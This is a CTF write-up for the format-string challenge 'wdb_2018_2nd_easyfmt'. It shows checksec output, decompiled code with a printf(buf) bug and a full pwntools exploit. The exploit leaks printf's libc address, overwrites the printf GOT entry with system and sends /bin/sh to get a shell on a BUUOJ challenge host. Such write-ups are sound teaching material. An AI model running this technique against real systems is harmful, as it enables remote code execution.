wdb_2018_2nd_easyfmt
https://github.com/hacker-mao/ctf_repo/tree/master/2018WDB
0x01
checksec
1 2 3 4 5 6 [*] '/home/zelas/Desktop/pwn/wdb_2018_2nd_easyfmt/wdb_2018_2nd_easyfmt' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled //栈不可执行 PIE: No PIE (0x8048000)
IDA
main()
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 int __cdecl __noreturn main (int argc, const char **argv, const char **envp) { char buf[100 ]; unsigned int v4; v4 = __readgsdword(0x14 u); setbuf(stdin , 0 ); setbuf(stdout , 0 ); setbuf(stderr , 0 ); puts ("Do you know repeater?" ); while ( 1 ) { read(0 , buf, 0x64 u); printf (buf); putchar (10 ); } }
0x02
思路 fmt str
首先通过格式化字符串泄露栈
通过格式化字符串修改printf_got表为system
发送/bin/sh\x00
0x03
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 from pwn import *context(os='linux' , arch='i386' , log_level='debug' ) io = remote("node4.buuoj.cn" , 27832 ) elf = ELF("./wdb_2018_2nd_easyfmt" ) libc = ELF("./libc-2.23.so" ) io.recvuntil("Do you know repeater?" ) printf_got = elf.got['printf' ] payload = flat(printf_got, b"%6$s" ) io.sendline(payload) printf_addr = u32(io.recvuntil("\xf7" )[-4 :]) print (hex (printf_addr))libc_base = printf_addr - libc.sym['printf' ] system = libc_base + libc.sym['system' ] log.success(hex (printf_got)) payload = fmtstr_payload(6 , {printf_got: system}) io.sendline(payload) io.sendline(b"/bin/sh\x00" ) io.interactive()
